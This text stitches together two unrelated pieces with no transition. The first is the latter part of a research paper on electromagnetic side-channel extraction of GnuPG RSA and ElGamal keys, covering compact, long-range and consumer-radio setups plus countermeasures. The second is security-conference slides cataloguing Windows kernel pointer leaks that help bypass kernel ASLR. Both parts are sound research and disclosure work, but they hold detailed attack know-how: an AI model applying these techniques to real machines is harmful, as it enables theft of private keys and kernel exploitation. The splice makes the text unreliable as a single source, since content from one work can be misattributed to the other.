tained 16 aggregate traces, one for each table index and its corresponding chosen ciphertext.
Peak Detection. As in the ElGamal case, for each aggregate trace corresponding to a table
indexu, we derived a vector of binary values representing the peaks and dips in this trace by
detecting peaks above some amplitude threshold and comparing their distances to a time threshold.
Figure 8(a) depicts some of the aggregated traces obtained during the RSA attack presented in
Section 2.3. As predicted in Section 2.3, any dip first appearing in some trace corresponding to
some table index ualso appears in traces corresponding to table indices u′>u.
However, note that in each subsequent trace the distance between the two peaks defining the
dip gets progressively shorter and therefore harder to observe. This is because the larger the value
u′−uis, the shorter the value stored in the u-th table index during the decryption of the ciphertext
targeting the u′-th table index (and in particular this value contains less zero limbs). Eventually the
distance between the two peaks defining a dip becomes indistinguishable from the regular distance
between two peaks (with no dip in between), making the dip impossible to observe. Thus, the
extracted vectors inevitably contain missing dips, requiring corrections as described next.
Inter-Window Dip Aggregation. In order to recover the undetected short dips, we had to
align all the aggregate vectors (corresponding to the different table indices). Luckily, even though
the dips get progressively shorter, in adjacent vectors (corresponding to table indices uandu+ 2)
there are sufficiently many common dips remaining to allow for alignment. Thus, the following
iterative process was performed between every two adjacent vectors. First, the current vector was
aligned to the previous one. Next, all missing dips were copied from the previous vector to the
current one, as follows: going over the vectors from start to end, as soon as a dip was located in
the previous vector that was missing from the current vector, it was copied to the current vector
(shifting all other vector elements one coordinate to the right). The current vector was used for
the next iteration. See Figure 8(b).
Revealing the RSA SM-Sequence. Note that each multiplication performed by Algorithm 1
corresponds to a dip in one of the binary vectors obtained in the previous stage. Thus, since in the
above aggregation process dips are propagated across adjacent vectors, the last vector corresponding
to table index 31 obtained after the aggregation process outlined above actually contains all the
SM-locations, where each multiplication is marked with a dip and each squaring operation is marked
with a peak. Thus, in order to recover the secret key, it remains for the attacker has to learn the
table index corresponding to every multiplication in the SM-sequence. Since each vector contains
all the dips of all previous vectors, for each multiplication, the corresponding table index is the
index of the vector where the dip appeared for the first time.
At this point the attacker has learned the exact SM-sequence and obtained, for each multi-
plication performed by line 29 of Algorithm 1, the corresponding value of the table index u. As
mentioned in Section 2.3, it is possible to recover the secret key from this data.
19
(a) Before peak detection (the horizontal axis is given in
miliseconds)
(b) After peak detection (the horizontal axis is the
peak/dip number and the vertical axis is “high” for peaks
and “low” for dips)
Figure 8: Three aggregate traces corresponding to table indices u= 3,5,7 obtained during our RSA
attack using a randomly-generated key.
Overall Attack Performance. Applying our attack to a randomly generated 4096-bit RSA
key by measuring the EM emanations from a Lenovo 3000 N200 laptop, we extracted the most-
significant 1250-bits for dpexcept for the first 5 bits.4For each chosen ciphertext, we used traces
obtained from 40 decryption operations, each taking about 0.2 sec. We thus measured a total of
16·40 = 640 decryptions.
3.5 Long-Range Attack
Experimental Setup. We also attempted to expand the range of our electromagnetic attack.
For simplicity, the experimental setup described in Section 3.1 does not contain an amplifier to
amplify the probe signals before digitizing them using the FUNcube Dongle Pro+ SDR receiver.
In order to extend the attack range, we added a 50dB gain stage using a pair of inexpensive low-
noise amplifiers (Mini-Circuits ZFL-500LN+ and ZFL-1000LN+ in series, USD 175 total). We also
added a low-pass filter before the amplifiers. See Figure 9.
Overall Attack Performance. Key extraction is possible with the antenna at a distance of half
a meter from the target (the attacker’s computer can be placed many meters away, connected by a
coaxial cable). Recording the EM emanations from a Lenovo 3000 N200 laptop from this distance,
our attack extracts the secret exponent of a randomly-generated 3072-bit ElGamal key (except for
the first 3 bits, which are readily guessed). As in Section 3.3, we use a total of 320 decryptions,
each taking about 0.1 sec.
4The first few bits of dpare harder to measure, due to stabilization time.
20
Figure 9: Long-range setup. The loop antenna is held half a meter above the target computer,
Lenovo 3000 N200 (left). The antenna is connected via a coaxial cable (blue) to a low-pass filter,
followed by a pair of amplifiers powered by a 15V DC voltage (red and black wires), leading to the
SDR receiver dongle attached to the attacker’s computer (right).
3.6 Untethered SDR Attack
The realization that the signal of interest is FM-modulated on a narrow bandwidth allowed us
to greatly simplify and shrink the analog and analog-to-digital portion of the measurement setup,
compared to prior works. One may thus wonder how small and cheap the whole setup can become.
This section shows how the measurements can be fully acquired by a compact device, untethered
to any wires. Our prototype, the Portable Instrument for Trace Acquisition ( Pita ), is built of
readily-available electronics and food items (see Figure 10).
Functionality. ThePita can be operated in two modes. In online mode , it connects wirelessly
to a nearby observation station via WiFi and provides real-time streaming of the digitized signal.
The live stream helps optimize probe placement and allows adaptive recalibration of the carrier
frequency and SDR gain adjustments (see Figure 11). In autonomous mode , thePita is configured
to continuously measure the electromagnetic field around a designated carrier frequency; it records
the digitized signal into an internal microSD card for later retrieval, by physical access or via WiFi.
In both cases, signal analysis is done offline, on a workstation.
Hardware. For compactness and simplicity, the Pita uses an unshielded loop antenna made
of plain copper wire, wound into 3 turns of diameter 13 cm , with a tuning capacitor chosen to
maximize sensitivity at 1.7 MHz (see Figure 10). These are connected to the aforementioned SDR
receiver (FUNcube Dongle Pro+).
We controlled the SDR receiver using a small embedded computer, the Rikomagic MK802 IV.
This is an inexpensive (USD 68) Android TV dongle based on the Rockchip RK3188 ARM SoC. It
supports USB host mode, WiFi and flash storage. We replaced the operating system with Debian
Linux in order to run our software, which operates the SDR receiver via USB and communicates via
WiFi. Power was provided by 4 NiMH AA batteries, which suffice for several hours of operation.5
5The batteries take up most of the weight and volume. The apparatus can be made lighter and thinner by using
a compact Li-Ion battery (e.g., a 700 mAh RCR-123 battery suffices for 1 hour), or a low-power embedded computer.
21
Controller
Rikomagic
 MK802 
 IV
Antenna tuning capacitor
SDR receiver
FUNcube
Dongle Pro
 +
Power
4xAA 
 batteries
WiFi
antenna
Loop antenna
MicroSD
 card
Pita bread
Figure 10: Portable Instrument for Trace Acquisition ( Pita ), a compact untethered measurement
device for low-bandwidth electromagnetic key-extraction attacks.
Overall Attack Performance. Applying our attack to a randomly generated 3072-bit ElGamal
key, we extracted all the bits of the secret exponent, except the most significant bit and the three
least significant bits, from a Lenovo 3000 N200 laptop. As in Section 3.3, we used a total of 320
decryptions, taking 0.1 sec each.
3.7 Consumer-Radio Attack
Despite its low cost and compact size, assembly of the Pita device still requires the purchase of an
SDR device. In this section, we show how to improvise a side-channel attack setup that extracts
ElGamal keys from GnuPG, using common household items.
As discussed, the leakage signal is frequency modulated (FM) around a carrier (1.5–2 MHz)
in the Medium Frequency band. While the required signal processing (frequency demodulation,
filtering, etc.) can be easily performed in software, we could not find any household item able to
digitize external signals at such frequencies. Since the frequency of the demodulated signal is only
a few kHz, an alternative approach is to attempt to perform the FM demodulation in hardware and
then digitize the resulting signal. While most household radio devices are capable of performing
FM demodulation, the frequency range used in commercial FM broadcasting is 88–108 MHz, which
is far outside the desired range. Within the commercial FM broadcasting band we did not observe
key-dependant leakage even using lab-grade equipment. Despite this frequency range problem, we
managed to use a plain consumer-grade radio receiver to acquire the desired signal, as decribed
below, replacing the magnetic probe and SDR receiver. After appropriate tuning, all that remained
was to record the radio’s headphone jack output, and digitally process the signal. See Figure 13.
Demodulation Principle. Most consumer radios are able to receive amplitude modulated (AM)
broadcasts in addition to the more popular FM. Commercial AM broadcasting typically uses parts
of the Medium Wave band (0.5–1.7 MHz), in which our signal of interest resides. AM signals are
received and routed through a completely different analog path than the FM signals, so the radio’s
internal FM demodulator cannot be used in these ranges. It ispossible, however, to use the AM
analog chain to perform unconventional FM demodulation. The AM path consists of an antenna,
22
Figure 11: Untethered measurement device in online mode. The Pita (handheld) measures the
target computer (left) at a specific frequency band and streams the digitized signal over WiFi, in
real time, to the attacker’s computer (right). The attacker’s computer can be many meters away
when using a direct WiFi connection, or (if the Pita is configured to use a suitable WiFi access
point) anywhere on the Internet.
a tuning filter, and an AM demodulation block. During normal operation, the tuning filter is set
so that its center frequency exactly matches that of the incoming signal, in order to maximize
reception quality. An FM signal received in this fashion would pass through the tuning filter
unchanged but be completely suppressed by the AM block since the amplitude of an FM signal is
essentially constant. By setting the center frequency of the tuning filter to be slightly (a few kHz)
off the frequency of the incoming signal, the slope of the filter effectively acts as an FM to AM
converter, transforming the frequency changes of the incoming signal into corresponding changes in
amplitude. The amplitude demodulation circuits then extract and amplify these amplitude changes
(while suppressing the still-present frequency deviations). See Figure 12.
Experimental Setup. This setup requires an AM radio receiver and an audio recorder (such
as a smartphone microphone input or a computer’s audio input). We used a plain hand-held
radio receiver (”Road Master” brand) and recorded its headphone output by connecting it to
the microphone input of an HTC EVO 4G smartphone, sampling at 48 Ksample /sec, through an
adapter cable (see Figure 13).6The radio served as a front-end replacing the magnetic probe, SDR
and digital demodulation.
Further Digital Signal Processing. The output of the radio’s headphone jack produced a
strong signal at around 8 kHz, which is similar to the frequency of the peaks Figure 6. After low-
pass filtering it at 16 kHz, traces similar to Figure 6 were obtained (see Figure 14). We then applied
the remainder of the signal processing algorithms discussed in Section 3.2.
Overall Attack Performance. Applying our attack to a randomly generated 3072-bit ElGamal
key by measuring the EM emanations from a Lenovo 3000 N200 laptop, we extracted all but the first
bit of the secret exponent. For each chosen ciphertext, we used traces obtained from 40 decryption
operations, each taking about 0.1 sec. We thus measured a total of 8 ·40 = 320 decryptions.
Similar results were obtained by directly connecting the radio’s output to a computer’s audio
input, recording at 48 Ksample/sec.
6This adapter cable activates the microphone input of the phone, by presenting a 4 .7kΩDC resistance between
the ground and microphone connectors in the phone’s TRRS jack [Mic]. Dedicated line-in inputs of PCs and sound
cards do not require an adapter.
23
Original signal
Frequency 
modulated signal
Frequency and 
amplitude 
modulated signalFigure 12: Illustrating FM to AM conversion using the AM tuning filter slope. The top (red)
signal is some periodic baseband signal. The middle (blue) signal is an FM modulation of the red
signal around some carrier fc. The bottom (green) signal is obtained by filtering the FM-modulated
signal through a slightly skewed bandpass filter, such that fcfalls on the filter’s positive slope; the
resulting signal is modulated in both amplitude and frequency. Note that the original baseband
signal can now be reconstructed by extracting the envelope of the resulting signal (black). (For
visual clarity, we compensate for the filter’s time delay and attenuation.)
Figure 13: The radio-based experimental setup attacking the Lenovo 3000 N200 target. The radio
receiver is placed near the target and tuned to approximately 1.5 MHz. The radio’s output is
connected, through the adapter cable, to the input of an HTC EVO 4G smartphone recording at
48 Ksample/sec.
24
Figure 14: A recording of the radio’s output, after 16 kHz low-pass filtering, during an ElGamal
decryption using an HTC EVO 4G smartphone and an adapter cable.
4 Discussion
In this paper we presented and experimentally demonstrated new side-channel attacks on crypto-
graphic implementations using sliding-window and fixed-window exponentiation. Our techniques
simultaneously achieve low analog bandwidth and high attack speed, and the measurement setup
is compact, cheap and unintrusive.
The attack does not rely on detecting movement of the sliding window (as in [FKM+06, CRI12]),
but rather detects the key-dependent use of specific table entries “poisoned” by chosen ciphertext.
Thus, the attack is also applicable to exponentiation algorithms that have a fixed schedule of
squarings and multiplications, such as the fixed-window method. Likewise, it is oblivious to cache-
attack mitigations that read the whole table, or that place all cache entries in addresses mapped
to the same cache set.
Software Countermeasures. Our attack chooses ciphertexts that target specific table indices.
For a targeted table index, the attacker learns the locations of the index in the sequence of squarings
and multiplications. Since the sequence of squarings and multiplications only depends on the secret
exponent, the attacker is able to reconstruct the secret exponent after recovering the location of
all table indices in the sequence of squarings and multiplications. One class of countermeasures
is an exponent randomization , which alters the sequence of squarings and multiplications between
invocations of the modular exponentiation.
Multiplicative Exponent Randomization. Given a base xand a secret exponent d, instead
of directly computing y=xdmodp, one can generate a random number rand compute y=
xd+r(p−1)modp. Notice that since(
xr(p−1))
≡1 (modp), it holds that y≡xd(modp). Sinceris
generated afresh for each exponentiation, the attacker cannot combine different executions in order
to recover the exponent d. See [Koc96] for a complete description.
Unfortunately, this countermeasure would incur significant performance overheads in the case
of GnuPG’s ElGamal implementation. While pis a 3072-bit number, the secret exponent d(i.e.,
−χin the notation of Section 1.5) is chosen to be approximately 400 bits long. Thus, instead of
computing y=xdmodpdirectly using a 400-bit exponent, the computation of xd+r(p−1)will use
an exponent of size 3072 bits, incurring a multiplicative slowdown of about ×3072/400≈7.
25
Additive Exponent Randomization. A cheaper exponent randomization alternative is addi-
tive exponent randomization (see [CJRR99, CJ01] and a related patent [Gou05]). The exponent is
additively divided into two shares and the modular exponentiation is performed separately on each
of them and eventually combined. Given a base x, instead of directly computing y=xdmodp, one
can generate a random number rand compute y1=x(−d−r)modpandy2=xrmodp. Finally,y
is recovered by computing y=y1·y2modp. In GnuPG’s ElGamal implementation, this requires
two modular exponentiations with 400 bit exponents, incurring a ×2 slowdown.
Ciphertext Randomization. Another countermeasure that generally blocks chosen cipher-
text attacks such as ours is ciphertext randomization , which randomizes the base of the modular
exponentiation and then cancels out the randomization.
For RSA decryption, this is a common countermeasure with low overhead: instead of decrypting
a given ciphertext cby directly computing cdmodn, one generates a random r∈Zn, computes re
(which is cheap since the RSA encryption exponent eis small, typically 65537), decrypts re·cand
finally divides by rto obtaincd. Current versions of GnuPG already employ this countermeasure
for RSA decryption, preventing the attack described in Section 2.3.
For ElGamal decryption, ciphertext randomization is more expensive. Given a ciphertext ( γ,δ),
a secret exponent χand a prime p, instead of computing γ−χ·δmodpdirectly, one generates a
randomr∈Z∗
pand computes y1=rχmodp,y2= (γ·r)−χmodpand finallyy1·y2·δmodp. In the
case of GnuPG’s ElGamal, this requires two modular exponentiations with 400-bit exponents, plus
an inversion operation, incurring again a ×2 slowdown. A new version of GnuPG, implementing
this countermeasure, was released concurrently with the public announcement of our results.
Acknowledgments
We thank Werner Koch, lead developer of GnuPG, for the prompt response to our disclosure and
the productive collaboration in adding suitable countermeasures. We thank Sharon Kessler for
editorial advice.
This work was sponsored by the Check Point Institute for Information Security; by European
Union’s Tenth Framework Programme (FP10/2010-2016) under grant agreement no. 259426 ERC-
CaC, by the Leona M. & Harry B. Helmsley Charitable Trust; by the Israeli Ministry of Science
and Technology; by the Israeli Centers of Research Excellence I-CORE program (center 4/11); and
by NATO’s Public Diplomacy Division in the Framework of ”Science for Peace”.
References
[AARR02] Dakshi Agrawal, Bruce Archambeault, Josyula R. Rao, and Pankaj Rohatgi. The EM
side-channel(s). In CHES , pages 29–45, 2002.
[And08] Ross J. Anderson. Security Engineering — A Guide to Building Dependable Distributed
Systems (2nd ed.) . Wiley, 2008.
[BB05] David Brumley and Dan Boneh. Remote timing attacks are practical. Computer
Networks , 48(5):701–716, 2005.
[Ber05] Daniel J. Bernstein. Cache-timing attacks on AES. 2005. URL: http://cr.yp.to/
papers.html#cachetiming .
[CFG+10] Christophe Clavier, Benoit Feix, Georges Gagnerot, Myl` ene Roussellet, and Vincent
Verneuil. Horizontal correlation analysis on exponentiation. In Miguel Soriano, Sihan
Qing, and Javier L ́ opez, editors, Information and Communications Security - ICICS
2010, pages 46–61. Springer, 2010.
26
[CJ01] Christophe Clavier and Marc Joye. Universal exponentiation algorithm. In CHES ,
pages 300–308. Springer, 2001.
[CJRR99] Suresh Chari, Charanjit S. Jutla, Josyula R. Rao, and Pankaj Rohatgi. Towards
sound approaches to counteract power-analysis attacks. In CRYPTO , pages 398–412.
Springer, 1999.
[CMR+13] Shane S. Clark, Hossen A. Mustafa, Benjamin Ransford, Jacob Sorber, Kevin Fu, and
Wenyuan Xu. Current events: Identifying webpages by tapping the electrical outlet.
InESORICS , pages 700–717, 2013.
[Cop97] Don Coppersmith. Small solutions to polynomial equations, and low exponent RSA
vulnerabilities. J. Cryptology , 10(4):233–260, 1997.
[CRI12] SPA/SEMA vulnerabilities of popular rsa-crt sliding window implementations, 2012.
CHES rump session. URL: https://www.cosic.esat.kuleuven.be/ches2012/ches_
rump/rs5.pdf .
[ElG85] Taher ElGamal. A public key cryptosystem and a signature scheme based on discrete
logarithms. IEEE Transactions on Information Theory , 31(4):469–472, 1985.
[Eni] The Enigmail Project. Enigmail: A simple interface for OpenPGP email security. URL:
https://www.enigmail.net .
[ETLR01] M. Elkins, D. Del Torto, R. Levien, and T. Roessler. MIME security with OpenPGP.
RFC 3156, 2001. URL: http://www.ietf.org/rfc/rfc3156.txt .
[FKM+06] Pierre-Alain Fouque, S ́ ebastien Kunz-Jacques, Gwena ̈ elle Martinet, Fr ́ ed ́ eric Muller,
and Fr ́ ed ́ eric Valette. Power attack on small RSA public exponent. In CHES , pages
339–353, 2006.
[Fun] FUNcube Dongle. URL: http://www.funcubedongle.com .
[GMO01] Karine Gandolfi, Christophe Mourtel, and Francis Olivier. Electromagnetic analysis:
concrete results. In CHES , pages 251–261, 2001.
[Gmp] GNU multiple precision arithmetic library. URL: http://gmplib.org/ .
[Gnu] GNU Radio. URL: http://gnuradio.org .
[Gou05] L. Goubin. Method for protecting an electronic system with modular exponentiation-
based cryptography against attacks by physical analysis, 2005. US Patent 6,973,190.
[Gpga] GNU Privacy Guard. URL: https://www.gnupg.org .
[Gpgb] GnuPG Frontends. URL: https://www.gnupg.org/related_software/frontends.
html .
[GPT14] Daniel Genkin, Itamar Pipman, and Eran Tromer. Get your hands off my laptop:
Physical side-channel key-extraction attacks on pcs. In CHES , pages 242–260, 2014.
[GST13] Daniel Genkin, Adi Shamir, and Eran Tromer. RSA key extraction via low-bandwidth
acoustic cryptanalysis (extended version). IACR Cryptology ePrint Archive , 2013:857,
2013. Extended version of [GST14].
[GST14] Daniel Genkin, Adi Shamir, and Eran Tromer. RSA key extraction via low-bandwidth
acoustic cryptanalysis. In CRYPTO , pages 444–461 (vol. 1), 2014. See [GST13] for
extended version.
[HIM+13] Johann Heyszl, Andreas Ibing, Stefan Mangard, Fabrizio De Santis, and Georg Sigl.
Clustering algorithms for non-profiled single-execution attacks on exponentiations. In
Smart Card Research and Advanced Applications - CARDIS 2013 , pages 79–93, 2013.
[HMA+08] Naofumi Homma, Atsushi Miyamoto, Takafumi Aoki, Akashi Satoh, and Adi Shamir.
Collision-based power analysis of modular exponentiation using chosen-message pairs.
InCHES , pages 15–29, 2008.
27
[KJJR11] Paul Kocher, Joshua Jaffe, Benjamin Jun, and Pankaj Rohatgi. Introduction to differ-
ential power analysis. Journal of Cryptographic Engineering , 1(1):5–27, 2011.
[KO62] A. Karatsuba and Y. Ofman. Multiplication of many-digital numbers by automatic
computers. Proceedings of the USSR Academy of Sciences , 145:293–294, 1962.
[Koc96] Paul C. Kocher. Timing attacks on implementations of diffie-hellman, RSA, DSS, and
other systems. In CRYPTO , pages 104–113, 1996.
[Mic] Making your own smartphone cable. URL: http://en.wiki.backyardbrains.com/
index.php?title=Making_your_own_Smartphone_Cable .
[Min] Minimalist GNU for Windows. URL: http://www.mingw.org .
[MIT14] MITRE. Common vulnerabilities and exposures list, entry CVE-2014-3591, 2014. URL:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3591 .
[MOP07] Stefan Mangard, Elisabeth Oswald, and Thomas Popp. Power Analysis Attacks —
Revealing the Secrets of Smart Cards . Springer, 2007.
[MVO96] Alfred J. Menezes, Scott A. Vanstone, and Paul C. Van Oorschot. Handbook of Applied
Cryptography . CRC Press, Inc., Boca Raton, FL, USA, 1st edition, 1996.
[OS06] Yossi Oren and Adi Shamir. How not to protect PCs from power
analysis, 2006. CRYPTO rump session. URL: http://iss.oy.ne.ro/
HowNotToProtectPCsFromPowerAnalysis .
[OST06] Dag Arne Osvik, Adi Shamir, and Eran Tromer. Cache attacks and countermeasures:
The case of AES. In CT-RSA , pages 1–20, 2006.
[Per05] Colin Percival. Cache missing for fun and profit. Presented at BSDCan, 2005. URL:
http://www.daemonology.net/hyperthreading-considered-harmful .
[QS01] Jean-Jacques Quisquater and David Samyde. Electromagnetic analysis (EMA): Mea-
sures and counter-measures for smart cards. In E-smart’01 , pages 200–210, 2001.
[RSA78] Ronald L. Rivest, Adi Shamir, and Leonard M. Adleman. A method for obtaining digi-
tal signatures and public-key cryptosystems. Communications of the ACM , 21(2):120–
126, 1978.
[RTL] Soft66RTL. URL: http://zao.jp/radio/soft66rtl .
[Smi99] D.C. Smith. Signal and noise measurement techniques using magnetic field probes.
InIEEE International Symposium on Electromagnetic Compatibility , volume 1, pages
559–563, 1999.
[vWWB11] Jasper G. J. van Woudenberg, Marc F. Witteman, and Bram Bakker. Improving
differential power analysis by elastic alignment. In Aggelos Kiayias, editor, CT-RSA ,
pages 104–119. Springer, 2011.
[Wal01] Colin D. Walter. Sliding windows succumbs to Big Mac attack. In CHES , pages
286–299, 2001.
[YF14] Yuval Yarom and Katrina Falkner. FLUSH+RELOAD: A high resolution, low noise,
L3 cache side-channel attack. In USENIX Security Symposium , pages 719–732, 2014.
[YLG+15] Yuval Yarom, Fangfei Liu, Qian Ge, Gernot Heiser, and Ruby B. Lee. Last-level cache
side-channel attacks are practical. In IEEE Symposium on Security and Privacy (S&P) ,
2015.
[ZP14] A. Zajic and M. Prvulovic. Experimental demonstration of electromagnetic information
leakage from modern processor-memory systems. IEEE Transactions on Electromag-
netic Compatibility , 56(4):885–893, 2014.
28© 2012 CrowdStrike, Inc. All rights reserved. 
I Got 99 Problem But a Kernel 
Pointer 
Ain’t
 One
There’s an info leak party at Ring 0
Alex Ionescu , Chief Architect @aionescu
Recon 2013 alex@crowdstrike.com
Bio
■
Reverse engineered Windows kernel since 1999
■
Lead kernel 
 developer for 
 ReactOS
 Project
■
Co
-
author 
 of Windows Internals 5
th
and 6
th
Edition
■
Founded 
 Winsider
 Seminars & Solutions Inc., to provide services 
and Windows Internals training 
 for enterprise/government
■
Interned at Apple for a few years (Core Platform Team)
■
Now Chief Architect at 
 CrowdStrike
Introduction
Outline
■
Introduction
■
Motivation and Previous Work
■
Old School API Leaks
■
System Design Leaks
■
Tracing/Debugging API Leaks
■
System Memory Leaks
■
SuperFetch Leaks
■
Conclusion
Motivation
■
Making Spender (
 grsecurity
 ) troll really hard
■
“Kernel ASLR has never been broken by anyone I know”
■
Got a really well thought out article in response 
Motivation (seriously)
■
Windows has been making a decent job of improving their ASLR in 
Windows 8
■
And newer protections are yet to come
■
Guessing of user
 -
mode addresses now requires bypassing
 :
■
High Entropy ASLR
■
Top
-
down and Bottom
 -
up Anonymous Memory Randomization
■
Heap Allocation Order Randomization
■
...etc...
■
But Kernel ASLR remains a big problem
■
As part of a local exploit, too much information is present/given away on the 
system to the attacker
■
Disparate papers/presentations exist on this issue
Previous Work
■
Too many to list them all
■
Matthew 
 Jurczyk
 , 
Tavis
 Ormandy, 
 Tarjei
 Mandt
 & the other usual 
suspects
Old School API Leaks
You Want... Module Base Addresses?
■
NtQuerySystemInformation
■
Class: 
 SystemModuleInformation
■
NEW
 Class: 
 SystemModuleInformationEx
■
Return type is RTL_PROCESS_MODULES with
■
RTL_PROCESS_MODULE_INFORMATION
■
RTL_PROCESS_MODULE_INFORMATION_EX
■
EX Adds Checksum, 
 TimeStamp
 , and Original Base
■
Before Windows 8, could also be used to query user
 -
mode 
libraries
You Want... All Kernel Object Addresses?
■
NtQuerySystemInformation
■
Class: 
 SystemObjectInformation
■
Return type is SYSTEM_OBJECT_INFORMATION
■
Contains
■
PVOID of the Kernel Object Address
■
PEPROCESS of the Kernel Object Creator
■
Requires the object type/system to enable “Maintain Type List”
You Want... Named Kernel Object Addresses?
■
NtQuerySystemInformation
■
Class: 
 SystemHandleInformation
■
NEW 
 Class: 
 SystemHandleInformationEx
■
Return type
■
SYSTEM_HANDLE_INFORMATION(_EX)
■
Contains
■
PVOID of the Kernel Object Address
■
HANDLE value in the process
■
Only returns 16
 -
bit handles and PIDs 
 –
must use Ex version
You Want... Kernel Lock Addresses?
■
NtQuerySystemInformation
■
Class: 
 SystemLockInformation
■
Return type
■
RTL_PROCESS_LOCKS with
■
RTL_PROCESS_LOCK_INFORMATION
■
Contains
■
PVOID of the Kernel Resource
■
PVOID of Kernel Thread Owner
You Want... Kernel Stack Addresses?
■
NtQuerySystemInformation
■
Class
 : 
SystemExtendedProcessInformation
■
Return type
■
SYSTEM_EXTENDED_THREAD_INFORMATION
■
Contains
■
PVOID of the Kernel Stack Base and Kernel Stack Limit
■
PVOID of the TEB
You Want... Kernel Pool Addresses?
■
NtQuerySystemInformation
■
Class
 : 
SystemBigPoolInformation
■
Return type
■
SYSTEM_BIGPOOL_INFORMATION with
■
SYSTEM_BIGPOOL_ENTRY
■
Contains
■
PVOID of the Kernel Pool Address (if > 4KB) (“Big”)
■
And Tag
System Design Leaks
Selectors and Descriptors
■
GDT and IDT are required pieces of any x86
 -
based processor 
design
■
GDT highly deprecated in x64
■
Address of the GDT and IDT is stored in GDTR and IDTR
■
CPU instruction exists to retrieve this (SGDT/SIDT)
■
It’s not privileged!
■
Additionally, entries in the GDT can be dumped on 32
 -
bit Windows
■
32
-
bit Windows has support for LDT, and implements API for querying it
■
But if no LDT is present, GDT is dumped instead
■
Use 
NtQueryInformationThread
 (
ThreadDescriptorTableEntry
 )
■
Reveals three TSS addresses, and KPCR address
■
Does not work on 64
 -
bit because no LDT is supported
ARM Software Thread ID Registers
■
Modern ARM processors implement TLS registers that can be 
used by operating system developers
■
Similar to 
 fs
/
gs
on x86/x64
■
Three are currently defined in the Cortex
 -
A9 architecture
■
TPIDRURW (User Read Write)
■
TPIDRURO (User Read Only)
■
TPIDRPRW (Privileged Read Write)
■
Windows 8 on ARM (Windows RT) uses these registers, as seen 
in the public header files
■
RURW 
 -
> TEB
■
RPRW 
 -
> KPCR
■
RURO 
 -
> KTHREAD!
ACPI Table Data
■
\
Device
 \
PhysicalMemory
 was accessible up until Windows Server 
2003 SP1 in order to dump contents of RAM as desired
■
Functionality was removed, but replaced with new API for
■
ACPI, SMBIOS, and 0xC0000
 -
>0xE0000 memory access
■
NtQuerySystemInformation
■
Class: 
 SystemFirmwareTableInformation
■
Use SYSTEM_FIRMWARE_TABLE_INFORMATION
■
Tables can store physical (RAM) addresses to devices and EFI
Trap Handler Leaks
■
Worked with a lot of these while writing 
 ReactOS
 ...
■
As an optimization, the kernel does not always build an SEH frame 
during certain operations
■
Such as a system call
■
Instead, the page fault handler recognizes if the exception came 
from one such optimized location
■
And does correct exception handling back to user
 -
mode
■
However, this is based on reading the EIP!
■
Playing guessing games with the EIP can reveal kernel addresses based on 
the exception generated
■
“j00ru” also discovered that some of these checks make crazy 
assumptions about other registers 
 -
> can cause crashes
Memory
 -
Based Leaks
Win32k Shared Memory Regions
■
Two “heaps” are implemented by the window management system
■
Session Heap (contains the object handle table)
■
Desktop Heap (contains the objects themselves)
■
To get session heap: user32!gSharedInfo
■
aheList
 -
> Session Heap Start (handle table)
■
ulSharedDelta
 
Difference between user and kernel
■
To get desktop heap: TEB
 -
>Win32ClientInfo
■
pvDesktopBase
 
Desktop Heap Start
■
ulClientDelta
 
Difference between user and kernel
Win32k Objects
■
Win32k Window Manager Handle Entries contain
■
PVOID of the Win32k Object (many/most are mapped in user
 -
space)
■
PVOID of the NT Kernel Object owner (PETHREAD and/or PEPROCESS)
■
Other structures are 
 tagDESKTOPINFO
 , 
tagSHAREDINFO
 , 
tagCLIENTTHREADINFO
 , 
tagDISPLAYINFO
 , 
tagSERVERINFO
■
These leak addresses of pointers inside kernel mode memory as 
well as things like mouse cursor position, last keys states...
■
The objects themselves contain many pointers to NT 
objects/
 addreses
HAL Heap
■
When the HAL initializes extremely early in the boot process, it 
does not have access to any memory management functionality
■
The boot loader, HAL, and kernel’s memory manager all 
collaborate to define a region of memory reserved for the HAL
■
0xFFD00000
 -
>0xFFFFFFFF is for the HAL (even on x64)
■
!
halpte
 shows current mappings on x86
■
hal!HalpHeapStart
 shows start of the heap
■
Used to store ACPI tables, as well as all the HAL Objects on 
Windows 8
Tracing/Debugging API Leaks
Trace
 -
Based ETW/WMI Leaks
■
The kernel has extensive tracing performed through either legacy 
Windows Management Instrumentation (WMI)
 or Event Tracing for 
Windows (ETW)
■
The relevant (documented) APIs are
■
StartTrace
■
ProcessTrace
■
Many of these come from “
 MSNT_SystemTrace
 ”
■
See 
http://msdn.microsoft.com/en
 -
us/library/windows/desktop/aa364083(v=vs.85).
 aspx
■
System Profiling Privilege is required
You Want... Kernel Process Pointers?
■
ETW “Crimson” Provider
■
Or Legacy WMI
■
PERF_PROC
■
Return type
■
WMI_PROCESS_INFORMATION
■
Contains
■
PVOID of the Kernel Object Address (“
 UniqueProcessKey
 ”)
■
PVOID of the Process Page Directory (“
 DirectoryTableBase
 ”)
You Want... Kernel Thread Pointers?
■
ETW “Crimson” Provider
■
Or Legacy WMI
■
PERF_THREAD
■
Return type
■
WMI_EXTENDED_THREAD_INFORMATION
■
Contains
■
PVOID of the Kernel Stack Base and Stack Limit
■
PVOID of the Kernel Start Address
You Want... Kernel Spinlock Addresses?
■
ETW “Crimson” Provider
■
PERF_SPINLOCK
■
Return type
■
WMI_SPINLOCK
■
Contains
■
PVOID of the Kernel Spinlock Address
■
PVOID of the Kernel Caller Address
■
And if Address is DPC or ISR
You Want... Kernel Resource Addresses?
■
ETW “Crimson” Provider
■
PERF_RESOURCE
■
Return type
■
WMI_RESOURCE
■
Contains
■
PVOID of the Kernel Resource Address
You Want... Kernel IRP and File Object Addresses?
■
ETW “Crimson” Provider
■
PERF_FILENAME
■
EVENT_TRACE_FLAG_DISK_IO
■
Return type
■
WMI_DISKIO_READWRITE
■
PERFINFO_FILE_INFORMATION/FILE_READ_WRITE
■
Contains
■
PVOID of the IRP
■
PVOID of the FILE_OBJECT
You Want... Kernel Page Fault Addresses?
■
ETW “Crimson” Provider
■
PERF_ALL_FAULTS
■
Return type
■
WMI_PAGE_FAULT
■
Contains
■
PVOID of the Fault Address
■
PVOID of the Program Counter
And there’s more...
■
DPC/ISR Tracing reveals the kernel pointer of every interrupt and 
DPC handler
■
Image Load Tracing reveals kernel base address of every kernel 
module
■
Pool Tracing reveals kernel address of every pool allocation
■
Even non
 -
big ones
■
New 
 Windows 8 Object/handle
 -
based Notifications
■
Leak the Kernel Object Pointer (and handle)
Triage Dumps
■
NtSystemDebugControl
 was a goldmine API in Windows XP
■
Allowed complete Ring 0 control from Ring 3 
■
In Server 2003 SP1, almost all commands were disabled
